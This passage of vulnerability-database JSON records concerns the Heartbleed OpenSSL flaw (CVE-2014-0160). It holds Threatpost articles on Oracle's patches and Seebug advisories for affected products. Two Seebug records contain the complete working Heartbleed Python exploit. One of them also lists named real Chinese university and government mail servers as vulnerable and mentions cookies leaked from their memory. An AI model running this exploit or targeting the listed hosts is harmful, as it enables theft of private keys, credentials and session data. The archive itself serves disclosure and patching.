"2018-10-06T22:58:58", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "As the dominoes continue to fall around Heartbleed, Oracle is doing its best to keep users apprised of its ongoing efforts to patch software that may be vulnerable to the OpenSSL vulnerability.\n\nIn a document [updated early this morning](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) Oracle gave its customers five separate updates regarding:\n\n * Products that were never vulnerable to Heartbleed\n * Products still under investigation that may be vulnerable to Heartbleed\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have fixes\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have no current fixes\n * Products that do not use OpenSSL and\n * An update regarding Oracle Cloud\n\nMost of the updates given by Oracle refer to Heartbleed not by its buzzy nickname but by its official Common Vulnerabilities and Exposures number, [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>).\n\nMore than 100 products \u2013 managers, gateways, switches and systems, etc. \u2013 were ruled safe by the company, mostly because they don\u2019t run a version of OpenSSL that was ruled vulnerable to the CVE-2014-0160 instability.\n\nElsewhere developers at the company are reportedly still looking into whether or not 10 different products, notably those that use the company\u2019s Art Technology Group and Corente technology, are vulnerable to Heartbleed. Information for those products is still forthcoming.\n\nFourteen products, mostly those that rely on MySQL, Oracle\u2019s Big Data Appliance and its Mobile Security Suite have been patched so far. The company is posting as soon as each product is remedied and then linking to their respective support sections.\n\nConversely, 11 products, including some builds of Java ME and five iterations of its Communications suite, are branded as \u201clikely\u201d vulnerable but no fixes are yet available.\n\nLastly, the company claims its still unsure of how Heartbleed affects products that rely on its Cloud computing technology but that it\u2019s \u201cinvestigating the implications of this issue across the Oracle stack.\u201d The bulk of cloud service products, including its Public Cloud, Managed Cloud Services and Cloud for Industry, are free of vulnerabilities but other services have been deemed \u201cunder investigation.\u201d\n\nOracle points out that the document should be considered as fluid and will continue to be updated as fixes and further mitigation instructions become available. Until then the patch and vulnerability information should be taken on an \u201cAS-IS\u201d basis.\n\nEnd users who deploy a variety of Oracle products on their networks have no doubt had their hands full with patches as of late. The Heartbleed update comes [just a few days after](<http://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494>) the company\u2019s regularly scheduled quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). That update resolved more than 100 security issues across Java SE, along with the company\u2019s Database and Fusion Middleware.\n", "modified": "2014-04-21T17:55:42", "published": "2014-04-21T13:55:42", "id": "THREATPOST:9012A325F248438FAC15C4FB3082A796", "href": "https://threatpost.com/oracle-gives-heartbleed-update-patches-14-products/105576/", "type": "threatpost", "title": "Oracle Gives Heartbleed Update, Patches 14 Products", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:59:00", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "Software maker and database management company Oracle yesterday released its quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). The release resolves more than 100 security vulnerabilities, many of which received high common vulnerability scoring system base scores and should be applied as soon as possible.\n\nProducts affected by the patch include but are not limited to Oracle Database, Fusion Middleware, Hyperion, Supply Chain Product Suite, iLearning, PeopleSoft Enterprise, Siebel CRM, Java SE, and Sun Microsystems Products Suite, including Oracle Linux and Virtualization, and Oracle MySQL.\n\nLast week, Oracle released a [list of products](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) affected by the [Heartbleed OpenSSL vulnerability](<http://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>), as well as their current status with respect to vulnerable versions of the encryption library.\n\nAmong the patches that should be prioritized are two bugs in Oracle\u2019s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate him or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there.\n\nThe update also closes off 20 Fusion middleware vulnerabilities, the most critical of which is remotely exploitable without authentication and could lead to a wide compromise of the WebLogic Server.\n\nAlso included in its April release are 37 Java vulnerabilities. Four of those received the highest possible CVSS ratings of 10.0. Oracle urges all user \u2013 home users in particular \u2013 to apply these patches immediately.\n\nThe patch update also fixes five vulnerabilities affecting Oracle Linux and Virtualization products. The most severe of these vulnerabilities could affect certain versions of Oracle Global Secure Desktop.\n\n\u201cDue to the relative severity of a number of the vulnerabilities fixed in this Critical Patch Update, Oracle strongly recommends that customers apply this Critical Patch Update as soon as possible,\u201d wrote Oracle security assurance manager, Eric Maurice.\n\nEarlier this month, [researchers from Security Explorations disclosed more than two dozen outstanding issues with the company\u2019s Java Cloud Service platform](<http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs/105190>). There is no mention of that line of products in the update, so it appears that the company did not resolve those bugs. At the beginning or March, researchers at the London-based computer security firm Portcullis claimed to uncover[ four bugs in the Oracle\u2019s Demantra Value Chain Planning suite of software](<http://threatpost.com/four-vulnerabilities-found-in-oracle-demantra/104574>). The update makes no mention of these vulnerabilities either.\n", "modified": "2014-04-21T14:36:06", "published": "2014-04-16T12:32:06", "id": "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "href": "https://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494/", "type": "threatpost", "title": "April 2014 Oracle Critical Patch Update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T17:27:54", "description": "CVE ID:CVE-2014-0160\r\n\r\nSplunk\u662f\u673a\u5668\u6570\u636e\u7684\u5f15\u64ce\u3002\u4f7f\u7528Splunk\u53ef\u6536\u96c6\u3001\u7d22\u5f15\u548c\u5229\u7528\u6240\u6709\u5e94\u7528\u7a0b\u5e8f\u3001\u670d\u52a1\u5668\u548c\u8bbe\u5907\uff08\u7269\u7406\u3001\u865a\u62df\u548c\u4e91\u4e2d\uff09\u751f\u6210\u7684\u5feb\u901f\u79fb\u52a8\u578b\u8ba1\u7b97\u673a\u6570\u636e\u3002\r\n\r\nSplunk\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\n0\nSplunk 6.x\nSplunk 6.0.3\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.splunk.com", "published": "2014-04-16T00:00:00", "title": "Splunk OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62198", "id": "SSV:62198", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T13:55:16", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86038", "id": "SSV:86038", "sourceData": "\n # Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n\r\ndef create_hello(version):\r\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\treturn hello\r\n\r\ndef create_hb(version):\r\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n\treturn hb\r\n\r\ndef hexdump(s):\r\n\tfor b in xrange(0, len(s), 16):\r\n\t\tlin = [c for c in s[b : b + 16]]\r\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n\tprint\r\n\r\ndef recvall(s, length, timeout=5):\r\n\tendtime = time.time() + timeout\r\n\trdata = ''\r\n\tremain = length\r\n\twhile remain > 0:\r\n\t\trtime = endtime - time.time()\r\n\t\tif rtime < 0:\r\n\t\t\treturn None\r\n\t\tr, w, e = select.select([s], [], [], 5)\r\n\t\tif s in r:\r\n\t\t\tdata = s.recv(remain)\r\n\t\t\t# EOF?\r\n\t\t\tif not data:\r\n\t\t\t\treturn None\r\n\t\t\trdata += data\r\n\t\t\tremain -= len(data)\r\n\treturn rdata\r\n\r\n\r\ndef recvmsg(s):\r\n\thdr = recvall(s, 5)\r\n\tif hdr is None:\r\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\r\n\t\treturn None, None, None\r\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\r\n\tpay = recvall(s, ln, 10)\r\n\tif pay is None:\r\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\r\n\t\treturn None, None, None\r\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n\treturn typ, ver, pay\r\n\r\ndef hit_hb(s,hb):\r\n\ts.send(hb)\r\n\twhile True:\r\n\t\ttyp, ver, pay = recvmsg(s)\r\n\t\tif typ is None:\r\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\r\n\t\t\treturn False\r\n\r\n\t\tif typ == 24:\r\n\t\t\tprint 'Received heartbeat response:'\r\n\t\t\thexdump(pay)\r\n\t\t\tif len(pay) > 3:\r\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\r\n\t\t\telse:\r\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\r\n\t\t\treturn True\r\n\r\n\t\tif typ == 21:\r\n\t\t\tprint 'Received alert:'\r\n\t\t\thexdump(pay)\r\n\t\t\tprint 'Server returned error, likely not vulnerable'\r\n\t\t\treturn False\r\n\r\ndef main():\r\n\topts, args = options.parse_args()\r\n\tif len(args) < 1:\r\n\t\toptions.print_help()\r\n\t\treturn\r\n\tfor i in range(len(version)):\r\n\t\tprint 'Trying ' + version[i][0] + '...'\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tprint 'Connecting...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.connect((args[0], opts.port))\r\n\t\tprint 'Sending Client Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hello(version[i][1]))\r\n\t\tprint 'Waiting for Server Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\twhile True:\r\n\t\t\ttyp, ver, pay = recvmsg(s)\r\n\t\t\tif typ == None:\r\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\r\n\t\t\t\treturn\r\n\t\t\t# Look for server hello done message.\r\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\r\n\t\t\t\tbreak\r\n\r\n\t\tprint 'Sending heartbeat request...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hb(version[i][1]))\r\n\t\tif hit_hb(s,create_hb(version[i][1])):\r\n\t\t\t#Stop if vulnerable\r\n\t\t\tbreak\r\n\r\nif __name__ == '__main__':\r\n\tmain()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86038"}, {"lastseen": "2017-11-19T17:27:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nSophos Antivirus\u662f\u4e00\u6b3e\u9632\u75c5\u6bd2\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSophos Antivirus for vShield\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSophos Antivirus for vShield 1.0\r\nSophos Antivirus for vShield 1.1\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.sophos.com", "published": "2014-04-16T00:00:00", "title": "Sophos Antivirus for vShield OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62197", "id": "SSV:62197", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:44", "description": "CVE ID:CVE-2014-0160\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nPostgreSQL 8.x\r\nPostgreSQL 9.x\nPostgreSQL 9.3.4-3, 9.2.8-3, 9.1.13-3, 9.0.17-3\u548c8.4.21-3\u7248\u672c\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.enterprisedb.com", "published": "2014-04-21T00:00:00", "title": "PostgreSQL OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62241", "id": "SSV:62241", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:26", "description": "CVE ID:CVE-2014-0160\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server Security\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server Security\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nF-Secure E-mail and Server Security 10.x\r\nF-Secure E-mail and Server Security 11.x\r\nF-Secure Server Security 10.x\r\nF-Secure Server Security 11.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.f-secure.com/en/web/labs_global/fsc-2014-1", "published": "2014-04-16T00:00:00", "title": "F-Secure E-mail/Server Security OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62185", "id": "SSV:62185", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:27:32", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u6253\u5305\u4e86\u4e00\u5806\u7f51\u7ad9,\u5185\u5b58\u91cc\u6709cookies :D\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\neYouMail 5 inurl:edu\n\u641c\u7d20\u51fa\u6765\u5c31\u80fd\u6709\u6f0f\u6d1e\u7684\u673a\u738790%\u5de6\u53f3\n\u524d\u4e09\u9875\u6210\u529f\u7684\u7ed3\u679c\n\n\n```\nmail.jn.gov.cn\nmail.hpu.edu.cn\nmail.just.edu.cn\nmail.hnust.edu.cn\nmail.tjut.edu.cn\nmail.shupl.edu.cn\nmail.haust.edu.cn\nmail.dufe.edu.cn\nmail.jliae.edu.cn\nmail.hist.edu.cn\ndn1s.cmc.edu.cn\nmail.hbpu.edu.cn\nmail.dzu.edu.cn\n```\n\n\nPOC\u9001\u4e0a \u81ea\u5df1\u6d4b\u8bd5\n\n\n```\n#!/usr/bin/python\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n #print pay\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\nif __name__ == '__main__':\n main()\n```\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg\" alt=\"1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg\" alt=\"2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg)\n\n\n\u5185\u5b58\u91cc\u6709cookies \n\n[<img src=\"https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg\" alt=\"3.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)", "published": "2014-04-11T00:00:00", "title": "\u4ebf\u90ae\u67d0\u7248\u672cOPENSSL heartbleed \u901a\u6740", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-95013", "id": "SSV:95013", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com", "published": "2014-04-21T00:00:00", "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62238", "id": "SSV:62238", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:38", "description": "CVE ID:CVE-2014-0160\r\n\r\nKerio Control\u662f\u4e00\u6b3e\u9632\u706b\u5899\u7cfb\u7edf\u3002\r\n\r\nKerio Control\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nKerio Control 8.x\nKerio Control 8.2.2 patch2\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.kerio.com", "published": "2014-04-16T00:00:00", "title": "Kerio Control OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": 